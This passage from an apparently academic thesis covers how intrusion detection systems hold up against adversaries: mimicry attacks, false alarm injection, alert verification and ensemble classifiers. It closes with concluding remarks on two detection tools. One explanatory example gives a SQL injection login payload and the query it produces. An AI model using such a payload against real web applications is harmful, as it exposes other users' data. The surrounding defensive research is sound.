not a stateful protocol, this attack instance cannot be detected without a stateful
analysis that evaluate the reassembly of fragments (in this case we suppose that for
each packet an event is generated).
In other cases, a stateful analysis is implied by the stateful protocol. For example,
to perform a complete TCP session analysis, it is needed to keep track of the three-
way handshake protocol between the two hosts, to check whether ack numbers are
consecutive (so as to correctly associate each packet to the specic TCP session),
and to look for a correct session termination procedure.
When Host-based IDS are taken into account, the statefulness of the analysis is
necessary to detect a sophisticated attack against the machine. In this case, state-
fulness is realized by correlating events occurring in the same machine at dierent
time instants.
5.5.3 Anomaly-based classication and result analysis

Motivation and purposes An anomaly-based IDS detects attack patterns if they
are not included in the model of legitimate activity. In principle, it is possible to
detect attacks variations or new attacks because anomaly detectors don't include a
model of attacks. The anomaly detection paradigm is a good choice in environments
where the normality (that is, a model describing the legitimate trac) can be well-
dened. For example, anomaly detection is useful when applied to a service specic
IDS, for example, analyzing GET requests of the HTTP trac, for which features
and their legitimate values can be well identied [Kruegel et al. (2005) (a)].
5.5.3.1 Anomaly-based Detection evasion
Typically, anomaly detectors may not provide information about the specic attack
that generated an alarm, because they detect anomalies. Whereas in signature-
based IDS it can be possible to deduce attacker's purposes, the analysis of alerts
produced by anomaly-based approaches can be more dicult. This issue can be an
obstacle when the correlation of outputs from dierent IDS is carried out, and it is
needed to detect a sophisticated attack.
Sometimes, it is possible to modify an attack to mimic the normal trac, while

retaining its malicious potential, provided that the features used by detectors are
known. This kind of attacks are called mimicry attacks. Whether such a technique
works successfully, then it can be concluded that the features used to discriminate
between legitimate trac and attacks are weak. Thus, during the design phase of
an anomaly detector, tests using mimicry attacks are valuable in determining its
weaknesses, and identify ways of improvement. It is interesting to note that this
kind of attack is associated to the classication phase of an IDS, and it does not
have a control over the feature selection phase. In other words, this attack exploits
the uncertainty of the learned discrimination function.
It has also been shown that for a specic host-based anomaly detector, namely
STIDE, it is possible to successfully generate mimicry attacks with an automated
process [Kayacik et al. (2007)]. The authors used a genetic programming approach
to build all components of a mimicry attack against a vulnerable (local buer over-
ow) traceroute application. This is another reason that suggests that the improve-
ment of an anomaly detector should be carried out starting from the early stages of
design of an anomaly detector, i.e., the feature extraction and selection phase.
Mimicry attacks can also be combined with worms. Worms can hide their prop-
agation by mutating so as to mimic the statistic prole of the normal trac (poly-
morphic blending attacks) [Kolesnikov and Lee (2004)]. Generally, the generation
of attacks that optimally match the normal trac prole is a hard problem (NP-
complete), but approximate solvers can be used to nd a near-optimal solution
[Fogla and Lee (2006)].
Anomaly-based Detection evasion: Solutions It can be possible to have an

idea of the type of attack that most likely generated an anomaly. For example, this
may be possible if multiple and specialized anomaly detectors (e.g. one for each class
of attack) are deployed. This may be exploited to detect sophisticated attacks, by
correlating multiple anomaly detectors. As we will further discuss, this solution may
also increase the robustness of anomaly-based systems against false alarm injection.
In [Wagner and Soto (2002)] it is developed a theoretical framework to evaluate

the robustness of a Host-based IDS against mimicry attacks. Dierent ways in
which an adversary can realize a mimicry attack are shown by referring to a HIDS
based on the analysis of operating system calls. They observed that the impact of
these attacks can be reduced if not only the executed system calls are taken into
account, but also the system calls which fail, considering the returned code, and the
arguments that have been passed. This outcome can be generalized, and it can be
said that to increase the robustness against mimicry attacks, the number of features
used to model legitimate activity must be increased. Obviously, the collection of
training data should guarantee the availability of all such features.
A dierent approach designed to thwart mimicry attacks is based on the injec-

tion of crafted human input alongside legitimate user activity [Borders et al. (2006)].
The crafted input is particularly designed to trigger a known sequence of network
requests, which is compared to the actual trac: unexpected messages are consid-
ered as malicious. The approach proposed in [Borders et al. (2006)] appears very
interesting, because it proposes a proactive method to system enforcement against
mimicry attacks. On the other hand this method presents also some drawbacks, be-
cause it can interfere with the original trac semantic. In any case, in our opinion
proactive methods against mimicry attacks should be further investigated as they
can be seen as a version of the Turing test.
Polymorphic blending attacks represent another relevant technique used to evade

IDS. To increase the robustness against such attacks, anomaly-based IDS that are
capable of detecting worms activities can be modeled as stochastic nite state au-
tomata. Then, polymorphic blending attacks can be prevented by excluding those
transitions that are traversed frequently by multiple polymorphic blending attacks,
and that oer a relative low contribute to discriminate between legitimate activities
and attacks [Fogla and Lee (2006)].
5.5.3.2 False alarm injection against Anomaly-based IDS
In the case of Anomaly-based IDS, the problem of false alarm injection is quite
relevant. A pattern might be anomalous even if it does not represent an attack.
Thus, an adversary might conceive such patterns to ood the alert log of an anomaly
detector with false alarms. Intuitively, the patterns that originate false alarms
should exhibit characteristics directly associated with the features used to model
the legitimate trac. In other words, an adversary should generate a well-specied
noise to perform false alarm injection. This noise is conceptually dierent from
the independent noise generated by legitimate patterns (erroneously) classied
as attacks. Whereas the independent noise is associated with false alarms due to
an incomplete model of legitimate patterns, the malicious noise might raise false
alarms because not all anomalous patterns represent attacks. Let us make a simple
example related to an anomaly detector for a web application. Most of the attacks
against web applications leverage on input validation vulnerabilities. Let us refer to
a web application whose URI is /mail/index.php that, using the HTTPS protocol,
receives the user input through the POST method, and instantiate a SQL query
to a database containing all e-mails. The user logs on the system by providing the
username and the password, e.g., user=john&password=3443ssa738dsh345. These
inputs can also be sent to an anomaly-based IDS by the web server. In this example,
there are two inputs: the rst, (john) is given through the user attribute and the
second (3443ssa738dsh345) is given through password attribute. The acquired
input data can be used in the following query:
SELECT * FROM usersmail

WHERE user='john' AND pass='3443ssa738dsh345'
to retrieve the incoming mail of user john from the database, and send it
to the web client. If this application does not strip out the quote spe-
cial symbol ('), there is a vulnerability to SQL injection attacks. So,
if an attacker make a POST request by providing the following inputs:
user='%20OR%20('a'='a&password=')%20OR%20'a'='a, the query becomes (%20
is the encoding of the space):
SELECT * FROM usersmail

WHERE user='' OR ('a'='a' AND pass='') OR 'a'='a'
which provides the attacker with the incoming mails of all users (the latter equiva-
lence 'a'='a' is always true).
An anomaly detector can inspect the two inputs, raising an alert if non alphanu-
meric characters are given. Thus, this anomaly detector can detect the attack of the
example, because some non alphanumeric characters are necessary (i.e. the quote
character). Even if such an anomaly detector can detect every attack leveraging on
input validation vulnerabilities, it can be overwhelmed of false alarms as many in-
puts containing non-alphanumeric characters are clearly not related to attacks. For
example, the input user=%20&password=%20 raises an alert even if this does not
represent an attack. Such a behavior is typical in anomaly-based IDS as an anomaly
is not necessarily an attack. As very often anomaly detectors are implemented by
machine learning algorithms, this is a reason for the careful use of machine learning
technique, as they can potentially produce a large volume of alarms compared to
the advantage of being able to detect novel attacks.
False alarm injection against Anomaly-based IDS: Solutions Even if it is

easier to inject false alarms in an anomaly-based IDS w.r.t. a misuse-based IDS, it is
also worth noting that a good knowledge of the features used by the IDS is necessary.
Thus, if such a knowledge cannot be easily acquired, the over-stimulation impact can
be reduced. This result can be attained for those cases in which a high-dimensional
and possibly redundant set of features can be devised. Handling high-dimensional
feature space typically require a feature selection step aimed at retaining a smaller
subset of high discriminative features, as learning in very high dimensional spaces
is not an easy task [Almuallim and Dietterich (1992)]. In order to exploit all the
available information carried out by a high-dimensional feature space, ensemble
methods have been proposed, where a number of machine learning algorithms are
trained on dierent feature subspace, and their results are then combined. These
techniques are currently used in the Intrusion Detection domain to improve overall
performances, and harden the evasion task, as the function that is implemented after
combination in more complex than that produced by an individual machine learning
algorithm [Giacinto et al. (2003), Corona et al. (2008), Perdisci et al. (2006) (b)].
The advantages of ensemble methods are discussed in detail in Section 5.5.5.
Here, as discussed in Section 5.3.2, we propose a technique that should be fur-
ther investigated as it can provide for additional hardness of evasion, and resilience
to false alarm injection. It is based on the use of randomness, so that, even if the
attacker has a perfect knowledge of the features extracted from data, and the learn-
ing algorithm employed, then in each time instant he cannot predict which subset of
features is used. This can be possible by learning an ensemble of dierent machine
learning algorithm on randomly selected subspaces of the entire feature set. Then,
these dierent models can be randomly combined during the operational phase. It
has been already shown that the combination of learning algorithms trained on a
random selection of subspaces may attain high performance [Ho (1998)]. In the case
of Intrusion Detection, we should also resort to a random selection of the members
of the ensemble. Provided that the learned models are suciently diverse, then
the combined models may be randomly combined and the result is typically more
accurate than the use of one individual model and of the entire feature space. In
addition, evasion and false alarm injection can be drastically reduced.
The above solution can be used only in cases when a high-dimensional and
possibly redundant set of features can be extracted. As it depends on the type
of data that is analyzed, on the characteristics of the service/application that is
protected, it is not always guaranteed that a random or pseudo-random selection of
feature provides the desired accuracy. In any case, we should always remind that
the design of leaning techniques in an adversary environment involves a sequence
of processing step, each step involving dierent representations on the available
knowledge. The desired accuracy and robustness of an IDS should not be required
at each processing step, but in the nal step only. Thus, typically, higher level
renement steps are necessary to discriminate between true alarms and false alarms.
On the other hand, if the security system has been completely evaded, i.e. if the
attacker has been able to hide all the traces of the attack, then no information can
be recovered. Consequently, at each intermediate step we must require the hardness

of evasion, while the resilience to false alarm injection can be handled by high-level
processing steps designed to perform alert verication.
5.5.4 Classication and result analysis: The alert verication so-

lution
Often, false alarms are related to unsuccessful attacks. For example, if the protected
network is based on one operating system platform (e.g., Windows), an IDS can raise
alarms even in cases of attacks against other operating systems (e.g., Linux), even
if such attacks are not eective. This consideration have lead to the concept of alert
verication [Kruegel et al. (2004)]. Such techniques are aimed at assessing whether
an attack related to an alert produced by the IDS successfully succeeded or not.
Essentially, alert verication is a post-processing task of any pattern recognition
system, where contextual information is used to validate the output of the system. In
the case of IDS, alert verication allows to cope with false alarms that are inevitably
generated by the IDS. In this sense, this technique can address also false alarm
injection in a general way.
Alert verication can be either passive or active [Kruegel et al. (2004)]. Passive
alert verication pregure checks based on a priori knowledge regarding network
topology, software installed in the monitored host(s), and available network services.
For example, it can be veried if a known exploit might be actually dangerous for the
destination host by checking if attack prerequisites are satised. Attack prerequisites
are the conditions under which an attack is successful, e.g., vulnerable operating
systems, vulnerable applications, availability of the network services involved, etc.,
and it can also be veried whether certain packets reached a certain destination
or not. The main disadvantage of passive checks is that they might be based on
outdated information, and that some information can not be a priori gathered.
Conversely, active alert verication pregure a set of checks performed after an
alert is raised. For example, it can be veried if new services (e.g., new applications,
and open ports) have been recently activated, whether a denial of service is present,
or whether critical les properties (e.g., permissions, owner, size, content) has been
recently changed. These kind of checks are always based on up-to-date information,
but, as they are gathered on-the-y, they can interfere with the normal operations
performed by the network/host.
An interesting aspect of alert verication is that, as a post-processing task, it

can handle errors made at each preceding step, as far as false alarms are concerned.
Of course at this step attack detection cannot be improved.
Alert verication mechanisms have to be specically designed according to the

IDS paradigm employed. For example, if a NIDS has been designed to handle am-
biguous trac streams by instantiating separate analysis threads for each possible
interpretation of the trac [Paxson and Handley (1999)], then it is possible to verify
whether the packet reassembling mechanism employed by the target host is vulner-
able to that attack. In the case of HIDS, active checks could be easily performed as
they involve characteristics of the host itself such as le system checks, analysis of
les recently added (in particular, executables), le modications, etc. Other checks
may involve modications in the system registry, or the addition of new users.
A misuse-based IDS can use passive check mechanisms to assess if attack prereq-
uisites are satised, and if typical evidences of a specic attack have been observed.
In this case, alert verication can be well-dened because attack characteristics and
the related eects are known in advance. In an anomaly-based IDS, alert verication
mechanisms may be more dicult to be dened, because only legitimate patterns
are known. On the other hand, as anomaly-based system provide protection against
new attacks and mutation of known attacks. The development of these techniques
may reduce the impact of false alarms typically associated to anomaly-based system.
For example, alerts raised by an anomaly-based system designed to protect a web
server can be veried by analyzing the outputs of the web server.
In [Bolzoni et al. (2007)], an interesting approach to perform alert correlation is

proposed. In that paper, each TCP connection on a monitored host is inspected.
Inbound TCP trac is inspected by one or more network-based IDS, whereas out-
bound TCP trac is analyzed by an anomaly detector. For each TCP connection,
the system keeps only the alerts for which the output of the monitored host(s) is
anomalous. This approach is reasonable since most of (successful) network attacks
produce some dierent output on target machines w.r.t. normal outputs. The au-
thors in [Bolzoni et al. (2007)] evidence that this approach may be very eective
to reduce the false positive rate (from 50% to all false alarms), without aecting
the detection rate. It is interesting to note that an analogous technique may be
applied to dierent protocols/abstraction levels (e.g. to protect a web server with
host based IDS), in order to provide more accurate and reliable results, even for
encrypted network connections.
Alert verication typically requires performing alert correlation aimed at han-

dling high volumes of alerts, and at providing the security administrator with high
level information about what is occurring in a network. Alerts are validated by tak-
ing into account other alerts produced either by the IDS itself, or by other network
appliances (e.g., rewall, router, etc.). At present, this task is a challenging open
research issue [Kruegel et al. (2005) (b)] [Bass (2000)], and it should be recognized
as a necessary step for eective intrusion detection deployment. This phase clearly
involves the use of high-level automatic reasoning techniques as information is rep-
resented and processed through high-level concepts, rather than low-level features
[Debar and Wespi (2001)]. In our opinion, the dierent roles and capabilities of
low-level feature processing, and concept reasoning in the intrusion detection eld
should be further investigated and assessed.
5.5.5 Classication and result analysis: solutions based on Multi-

ple Classier Systems
Multiple Classier Systems (MCS), a.k.a., ensemble learning approaches, have been
applied successfully in many dierent research elds, among them the detection of
intrusions in computer systems. In the intrusion detection eld, MCS are moti-
vated by the presence of dierent network protocols, multiple concurrent network
connections, distinct host applications and operating systems. Patterns extracted
from this heterogeneous domain are very dicult to characterize. In fact, it is very
dicult to take into account the domain knowledge as a whole in the design of the
classier. In general, by increasing the number of features, the pattern recognition
task become even more complex and less tractable.
MCS provide a solution to address these issues. The intuitive advantage given
by the MCS approach is supported by the results in [Lee and Xiang (2001)], where
the complexity of the classication task is measured by the information theory
approach. The subdivision of the classication problem in multiple sub-problems
turns out to decrease the entropy of each subset of training patterns, which in general
coincides with the ability to construct a more precise model of the normal trac.
The intrusion detection domain can be seen as the union of dierent sub-domains,
each one providing for complementary information. A sub-domain can be charac-
terized by a specic:
abstraction level i.e. a group of network protocols, user logins on dierent hosts;
place i.e. software applications (managing the routing table) in a router, software
applications running in a host;
Each sub-domain can be decomposed and analyzed in more detail. For example,
considering a group of protocols with a specic abstraction level (e.g. HTTP, FTP
and SMTP), the related syntax and semantic can be implemented in the design of
service-specic classiers. This allows for including the sub-domain knowledge, with
a more precise and clear modeling of patterns. Recent works clearly followed this
approach by focussing on the analysis of specic applications or services for this
suitable capability.
A suitable MCS approach may face with the adversarial environment in general.
For example, classiers based on dierent training algorithms can be used for a
specic set of features: for an adversary it could be necessary to inject dierent
types of malicious noise, each one conceived to aect a specic classier of the
ensemble. Also, such a noise could aect some feature subsets, without decreasing
signicantly the overall performance of the MCS. However, to date, the contribution
of MCS against the problem of learning in presence of malicious patterns have to
be further researched. On the other hand, a recent paper showed experimentally
that the MCS approach is able to increase the robustness against an adversarial
environment during the classication phase of an IDS [Perdisci et al. (2006) (b)].
Finally, the MCS approach could be very helpful to implement eective alert
verication mechanisms. Using multiple, specic, classiers it is possible to provide
for specialized alert and more reliable alert verication processes also. For example,
by using an application-specic classier, it is possible to evaluate application oper-
ations and outputs in a more detailed fashion, including the knowledge about this
specic sub-domain.
5.6. Storage box 129
5.6 Storage box

An IDS is a software that needs, at least, an operating system to interact with the
network, a storage element to store alerts and logs, a reliable computer. Thus, when
discussing about an adversarial environment against the so-called storage box, it is
useful to make a generalisation and consider all the components that are tightly
coupled with the IDS. It is easy to see that all the components coupled with the
IDS are a possible source of weakness and can interfere on its work. An attacker
can thus leverage on anyone of these components to modify the behavior of the
IDS to its own benet. That is, not only the detection engine should be designed
carefully, but also all the hardware and software architecture of an IDS should
be designed as carefully as the IDS. The meaning of the term careful depends
upon the security requirement of the application environment (e.g., bank, home,
public administration . . . ). As an example, a perfect IDS is perfectly useless, if the
underlying operating system have a signicant vulnerability that allows an attacker
to gain administrative privileges on the computer, and, then, shutdown the IDS. For
these reasons, commercial network-based IDS/IPS solutions are typically appliances
made up of a comprehensive and complete hardware and software suite, with custom
hardware and operating system [IBM ISS IPS, Cisco IPS]. Thus, the vulnerability
of the IDS as a host in the protected network is reduced w.r.t. hosts that run public
services.
On the other hand, open-source network-based IDS/IPS solutions can be more
weak from this point of view, as they need a host machine and a host operating
system. As a consequence, to attain a reliable solution, a high-level knowledge of
the IDS itself and the related environment is needed to correctly choose and congure
the operating system and the host machine.
5.7 Countermeasure box

A passive IDS (i.e. an IDS that audit passively the network) is helpful to limit the in-
trusion damages, and provides useful information for future security improvements.
Unfortunately, passive IDS cannot increase the real-time security, as a response
by the security team typically require a longer time compared to the dynamic of
attacks.
Intrusion Protection Systems, which actively block attacks in real time, provide
an additional layer of security. For example an IPS that acquire data from the
network, can be capable to protect against intrusions by blocking suspected actions,
thus avoiding that the suspected trac reaches the protected hosts.
IPS are critical in an adversarial environment as an attacker may simulate the
countermeasures so that they are used against the protected network. An attacker
may trick an IPS so that a legitimate user is considered a suspect user by the
IPS, and thus the related trac can be blocked. This eect can be achieved by
the attacker by using the spoofed IP address of the legitimate user and launching
a number of portscans. In response, the IPS, might block certain connections of
the victim or deny the access to certain services to protect the network. From the
point of view of the legitimate user, the attacker realized a denial of service. In
addition, an adversary can easily infer the detection rules of the IPS if he is the
target of the countermeasure feedback. As a consequence, the adversary can evade
or over-stimulate the IDS.
Recently, a new approach to computer security has emerged: Active Intrusion

Prevention (AIP) [Green et al. (2007)]. Such an approach is based on a sort of
feedback from a suspected attacker. The AIP system examines all the activity on
the network, looking for requests for data that can be potentially aimed to break into
the network for hostile purposes. In these situations, the AIP system will provide
the requested data that will be specially marked. If the attacker uses the marked
information, then the AIP has additional support to the hypothesis that the request
for data is related to an attack. In this manner the AIP approach yields more
accurate identication of hostile events. Other advantages of this approach include
early attack identication, and protection from both known and unknown attacks.
Further, the AIP system captures information about the originator of the attack,
thus enabling it to be blocked completely and prevent future attempts. In fact,
AIP programs routinely accumulate and compile data on the attacker, the attacked
system, and the setting under which the activities occurred. This data can be used
for more comprehensive statistical analysis that can provide guidelines for setting
up and managing eective security measures for the entire network.
AIP is a very interesting approach, but for high network bit-rates, what is the
impact of such a solution? Also, it is needed to investigate the robustness of such an
approach. AIP may also suer from the same problems of IPS, i.e., that an attacker
may spot the marked data and thus exploit this information to evade the detection.
As countermeasures are essentially attacks that the defender carries against the
attacker, it should be clear that in this case the attacker plays the role of the
defender, and, as a consequence, all the techniques typically used for detecting
intrusions can be used by the attacker to look for countermeasures. Thus, counter-
measures should be carefully designed as they can be used by the attacker to gain
knowledge about the security mechanisms employed by the protected network.
5.8 Discussion
Intrusion Detection Systems operate in a hostile environment. This aspect cannot
be neglected, if the goal is to design (or choose) reliable and robust IDS solutions.
However, it is clear that this goal is not easy to achieve. For this reason, in this
Section we summarize the key aspects which derive from our analysis.
First of all, each IDS solution should be thoroughly tuned to the specic intru-
sion detection problem. That is, depending on the key asset we need to protect a
dierent IDS solution is necessary. It does not exist a general solution for intru-
sion detection. The more the IDS solution is generic, the less it will be eective.
Thus, the knowledge of strenghts and weaknesses of dierent design choices is of key
5.8. Discussion 131
Figure 5.3: Summary of the pros/cons of host and network data acquisition. Dotted
arrows indicate some proposed solutions to cope with the cons of each acquisition
method
importance.
Network-based IDS may be fooled by leveraging on any dierence between the

trac recostruction (view) of the network sensor(s), and that of the destination
host(s). The key point is that NIDS are fundamentally unfavored when the detection
of attacks requires the emulation of host side processing. Thus, in our opinion, when
it is possible, NIDS should be deployed to detect attacks which are clearly network-
based, e.g, portscan, syn ooding, Distributed DOS, bootnet probing events. This
because, in order to reliably detect these attacks, we do not need any emulation of
host side trac processing. Since this approach focuses on a specic attack category,
it may also increase the performance of network sensors.
On the other hand, host sensors should be employed to monitor the host side
applications/operating systems. The deployment of host sensors should be carefully
chosen in order to monitor the behavior of the systems which manage the key asset
(information) we need to protect. Of course, host sensors may be disabled after the
target machine is compromised. Also, if the attacker exploits some vulnerability
on the system which provides the input data to the host sensor, it may be evaded.
As discussed in Section 5.1.2, a robust solution may be based on Virtual Machine
Introspection. In our opinion, this is the most powerful solution to strengthen the
host data acquisition phase, if applicable.
Figure 5.3 summarizes pros and cons of host and network data acquisition. We
highlight some proposed solutions, in order to cope with cons of each acquisition
method. From the gure, it is evident that the practical choice of the acquisition
method should consider many dierent factors. However, this scheme is useful to
quickly focus on the acquisition choices that allow attaining the best tradeo be-
tween IDS reliability and practical sensor deployment.
From a research point of view, it is interesting to correlate network and host

data to further strenghten the IDS design. This because, for an adversary it is
more dicult to simultaneously aect both network and host sensor(s) measure-
ments. In particular, this correlation may be based on data reconciliation techniques
[Corona et al. (2009)]. For example, we may measure the same variable from both
a network node and a host sensor, and then check whether the two values match
or not. If the two values do not match, we have two most probable cases: (1) a
successful attack against the target host aected the host sensor measurement; (2)
the network sensor has a aw in the network trac reconstruction (this may be due
to an evading attack against the network sensor). A similar approach may be useful
to correlate information between dierent host sensors (e.g. placed in dierent hosts
which are exchanging information) or dierent network sensors (e.g. which share a
common trac ow).
As well as the data acquisition choice, the choice of the detection method
should thoroughly consider the specic intrusion detection problem. In our opin-
ion, anomaly based intrusion detection is the most promising technique for future
IDS solutions. The key point is that hundreds of new (never-before-seen) attacks
are developed on a daily basis. These attacks are perhaps the most threatening
attacks, since they may not be detected by misuse-based IDS, and their eect(s) is
unknown. Also, automatic training mechanisms for anomaly-based detectors may
be easily (and reliably) applied. Conversely, automatic training mechanisms for
misuse-based detectors may be exposed to attacks, because the main information
source is the attacker itself (see Section 5.5.2). For example, a MCS architecture
may be built providing for independent and specialized anomaly detectors. Such
subdivision may be driven by the a-priori knowledge of the problem, i.e., we may
subdivide the intrusion detection problem in multiple subproblems. In such a way,
each anomaly detector may spot a particular category of attack. Then, for each
anomaly-sensor a well-suited alert verication technique, and a dierent counter-
measure may be dened. Then the correlation of the output from multiple anomaly
sensors may help us to both (1) further reduce the false positive rate, (2) gain a
more thorough analysis of the events occurring on computer network(s)/host(s).
Figure 5.4 summarizes pros and cons of anomaly- and misuse-based detection.
From such a gure, it is easy to see that since the two methods are complementary
they should be used concurrently (if possible). However, in our opinion anomaly-
based detection needs further research, since its pros are really relevant to most of
current intrusion detection problems.
Now, we aim at giving to the reader a brief, practical scheme to support the
design of IDS. This scheme is made up of eight points:
(1) What is the key information (asset) you need to protect? Clearly dene what
is the relevant information.
(2) Identify all (security) relevant systems, i.e. each system which manages or
carries such a piece of information. Assign to each system Si a degree of
5.8. Discussion 133
Figure 5.4: Summary of the pros/cons of anomaly- and misuse-based detection. Dot-
ted arrows indicate some proposed solutions to cope with the cons of each detection
method.
relevance αi (e.g. from 0 to 1). This degree may be evaluated by considering

how the information is aected after the system is jeopardized.
(3) Assign a degree of weakness βi to each relevant system Si (e.g. from 0 to

1). For example, you may evaluate such a degree by analyzing most common
attacks (e.g. from the MITRE's CVE archive). Also, you should consider
the exposition of such a system to attacks, i.e. how many users may access
to this system. Furthermore, typically, the more the architecture and the
conguration of Si are suited to its task, the more dicult for an attacker to
nd vulnerabilities (e.g. due to default conguration or common, vulnerable
architectures).
(4) Let wi be the degree of security vulnerability introduced by the system Si ,

computed as wi = α · β . Consider the system Si having the highest value of
wi .
(5) Evaluate carefully the pros and cons of data acquisition methods in g. 5.3
and the typology of input data of Si . Choose the best tradeo between the
reliability of acquired data and the constraints of sensors' deployment imposed
by system Si (and its environment). You may provide for data fusion mech-
anisms, to correlate data acquired from network and host sensors (e.g. using
data reconciliation techniques).
(6) Choose a suitable detection strategy for Si , evaluating carefully pros and cons of
each detection method in g. 5.4. You may correlate the information related
to known attacks (misuse-based) and detected anomalies (anomaly-based), to
further enhance the situational awareness about security-related events.
(7) Provide for automatic alert verication and counteraction techniques, depend-
ing on the type of attacks (or anomalies). The more such techniques are suited
to system Si , the more their reliability. Automatic cunteractions should be
taken in response to events that are classied as attacks (or anomalies) with
high level of condence. In order to validate the alerts, you may need to ac-
quire more data from network or hosts. For example, you may validate an
alert if the output of Si is anomalous, in analogy with the approach proposed
in [Bolzoni et al. (2007)]. On the other hand, for each validated alert, you
should provide for an automatic counteraction. This counteraction should be
aimed at protecting your key asset. For example, you may decide not to per-
form a database query, if such a query is generated by a system for which
the IDS has just raised an alert. Furthermore, you should evaluate whether
automatic actions may be used against the protected asset.
(8) At this point, update the value of wi , after the adoption of the IDS solution for
Si . Go to point (4). You should iterate until the expected security level, which
may be evaluated as 1 − maxi (wi ) is not reached yet. The security budget
should be sucient to reach such a security level.
A graphical description of such a scheme is depicted in g. 5.8. These points

may be used as a reference to choose dierent commercial/open-source IDS solutions,
also. In this case, we should choose the solution that is able to lower the value of
maxi (wi ), the most. Data preprocessing, feature and model selection steps may be
further dened for each system Si , following the discussion in sections 5.2, 5.3, 5.4,
respectively.
5.9 Conclusions and future work

Computer security is a research eld that must face the presence of an adversary.
The adversary is motivated to break security policies and evade security mechanisms,
with minimum eort. Attack techniques are becoming even more sophisticated,
and cyber-criminal activities are even more coordinated. Thus, Intrusion Detection
Systems play an even more important role on computer security. IDS perform
a pattern recognition task, i.e. they distinguish between legitimate patterns and
attack patterns in computer systems. As far as computer security is concerned, IDS
must face with an adversarial environment.
This aspect cannot be neglected, if the goal is to design reliable and robust IDS
solutions. Our contribution is a detailed study of IDS in the context of the ad-
versarial environment. We subdivided the design process of an intrusion detection
systems into 7 steps, and then we analyzed in detail the impact of the adversarial
environment on intrusion detection systems, in each one of the dierent phases and
components of their design. This analysis has been exploited to gain a wide knowl-
edge of the problem statement, by critically reviewing related work both in terms
of problem formulation, contributions and proposed solutions. Then, we evidenced
5.9. Conclusions and future work 135
Figure 5.5: Our proposed guideline to the design of robust IDS solutions, in order
to cope with an adversarial environment. For details regarding the choice of data
acquisition and detection methods, refer to gg. 5.3 and 5.4, respectively.
the pros and the cons of each one of the main IDS classes, and suggested how to
address the cons. Our study can be employed as a reference to both design robust
IDS solutions or evaluate the quality of dierent IDS solutions.
Future work is necessary to evaluate experimentally (and theoretically) the bene-
ts of an adversary-aware design of IDS solutions. Finally, we hope that the results
of our study could be used as foundations for new, interesting approaches to the
detection of cyber-attacks.
Chapter 6
Concluding remarks
Most of today's Internet security threats are associated to the World Wide Web
(or simply, web). This thesis addressed some of the key problems of today's web
security. In particular, this thesis presented two research tools developed during the
three-years PhD course, namely Flux Buster and Web Guardian. These two tools
have been ideated to improve both client-side and server-side web security.
Through Flux Buster we may accurately characterize and detect fast ux net-
works, regardless the way they are advertised. As mentioned in Section 3.1, fast ux
networks are an emerging, pervasive threat for Internet security. Fast ux networks
are nowadays adopted by criminal organizations to host malicious websites that
support an enormous number of scams. We showed experimentally that by means
of our system we may enhance the security of web users. First, we may comple-
ment the state-of-the-art protection oered by Google safebrowsing to current web
browsers. Furthermore, we may detect suspicious websites in real-time. This may
allow for an advanced real-time protection of web users, but also for an increased
eectiveness of spam lters.
On the other hand, by means of Web Guardian, we may protect web services.
Web Guardian is able to accurately detect web attacks targeting either web server
or web applications, for either encrypted (HTTPS) and unencrypted (HTTP) web
trac. In particular, its features allow the detection of input validation attacks,
the most popular and threatening attacks to date. The key contribution of Web
Guardian is that its training is fast and do not require supervision. Moreover,
its anomaly-based approach allows for the detection of both known and unknown
attacks. Finally, our system provides detailed information about anomalous requests
and may provide for automatic counteractions, to prevent both known and unknown
exploits.
Thus, our research may signicantly benet the state-of-the-art Internet secu-
rity. However, in this thesis we presented a more general contribution. Current
security trends suggest (and we strongly believe) that future IDS solutions must
be adversary-aware, to cope with the increasing sophistication of attacks and ex-
ploitation techniques. That is, it is not sucient to face current attacks, but we
must consider how an hostile adversary may aect the reliability our IDS solution.
In spite of the high number of related works, an overall picture of the problem is
still lacking. Thus, we studied this problem and critically revised previous work
to outline a general guideline for the development/choice of adversary-aware IDS
solutions. This guideline is very helpful (and necessary) since the problem is fairly
complex and depends upon so many uncertain variables. On the other hand, to the
138 Chapter 6. Concluding remarks
best of our knowledge, this is the rst work that performs such an extensive study.
It is worth noting that our detection systems reect many of the key points we
outline for adversary-aware IDS solutions (see Section 5.8):
• Flux Buster
It adopts a passive network data collection. This is suitable since fast ux
networks are entities that can be reliably evidenced at network level. Also,
it works in a stealthy way. Contrary, active approaches (i.e. automatic
resolution of suspicious domain names) to the collection of DNS data
may be easily detected (and thus defeated) by miscreants who control
authoritative DNS servers.
Miscreants may inject noise on the data collected by Flux Buster, but
for them it is counterproductive. This because the domain name resolu-
tion is performed by Internet users and returning legitimate IP addresses
may actually reduce the eectiveness of fast ux domain names. In any
case, we may lter our pool of ux agents, for example, by removing IP
addresses pointing to most popular websites.
Miscreants may tune their ux domain names so that the features used
by Flux Buster are not sucient to distinguish them from legitimate
services, such as CDN. If so, Flux Buster may not detect them. However,
this may be dicult, since miscreants typically have no control on the
uptime of ux agents. In any case, we may easily extend (and improve)
the set of discriminant features modeled by Flux Buster.
• Web Guardian
The anomaly-based approach allows Web Guardian to provide protec-

tion against unknown vulnerabilities on web servers and web applica-
tions. Also, this approach is more dicult to evade than signature-based
approaches adopted by most Web Application Firewalls.
The design of Web Guardian cope with attacks inside the set of web
requests used to infer the normal (legitimate) trac prole. Thus, under
the reasonable assumption that malicious requests are in lower number
than legitimate requests, for miscreants it is dicult to aect the learning
phase of our system. Also, we keep track of the number of samples of
each model to evaluate its reliability. This is important to cope with false
alarms and to provide for well-suited counteractions.
Desynchronization attacks against Web Guardian are dicult (see Sec-

tion 5.1.1.1), since input data is acquired directly from the web server.
These points evidence as the design of our systems may eectively face an ad-
versarial environment. Nevertheless, thanks to our general study in Chapter 5, we
recognize some open issues and ways of improvement:
139
• Flux Buster
We must verify the actual false negative rate, because it is (unlikely,

but) possible that some ux domain names are actually discarded by our
pre-ltering stage. For example, we could select ltered domain names
whose patterns are placed near the decision surface of our preltering
stage. Then, we may analyze them using other fast ux detection tools
(e.g. [DNSBL]). Furthermore, we may look for ltered domain names
which share some resolved IP addresses with out pool of ux agents.
• Web Guardian
A more extensive experimental evaluation is necessary.
We may cope with false alarm injection attacks. To this end, we may
provide for automatic alert verication mechanisms. Depending on the
type of anomalies, we may provide for a well-suited alert verication tech-
nique. Also, as mentioned in Section 5.9, even if a false alarm injection
attack is performed, automatic counteractions may still prevent attackers
to successfully exploit web services.
Web Guardian may not be able to spot attacks targeting the logic of web
applications. To this end, other features must be added.
Alerts describe detailed anomalies, but not attacks. We may group

anomalies and infer the attack class, to provide for more informative
